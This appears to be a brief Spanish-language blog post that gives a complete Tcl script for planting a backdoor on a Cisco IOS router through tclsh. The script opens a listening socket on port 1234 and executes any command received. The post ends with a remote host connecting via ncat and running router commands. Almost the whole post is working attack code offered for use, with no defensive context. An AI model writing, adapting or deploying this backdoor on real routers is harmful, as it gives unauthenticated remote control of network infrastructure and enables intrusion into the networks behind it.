# IOS backdoor con TCL

Introducción

IOS backdoor
TCL

Ejecución
Router#tclsh
Router(tcl)#proc backdoor {port} {
+> global shell loop
+> set shell [socket -server bdsh $port]
+> vwait loop
+> close $shell
+>}

Router(tcl)#proc bdsh {socket ip port} {
+> fconfigure $socket -buffering line
+> puts -nonewline $socket "#"
+> flush $socket
+> fileevent $socket readable [list echo $socket]
+>}

Router(tcl)#proc echo {socket} {
+> global loop
+> if {![catch {gets $socket command}] && ![eof $socket]} {
+>  switch -exact -- $command {
+>   :exit { return [close $socket] }
+>   :stop { set loop end; return [close $socket] }
+>   default { execute $socket $command }
+>  }
+> }
+>}

Router(tcl)#proc execute {socket command} {
+> catch {eval "exec $command"} output
+> if {[catch {puts $socket $output}]} {
+>  return [close $socket]
+> } else {
+>  puts -nonewline $socket "#"
+>  flush $socket
+> }
+>}

Router(tcl)#backdoor 1234
remote_host# ncat Router 1234
#show run | i hostname
hostname Router
#

No comments: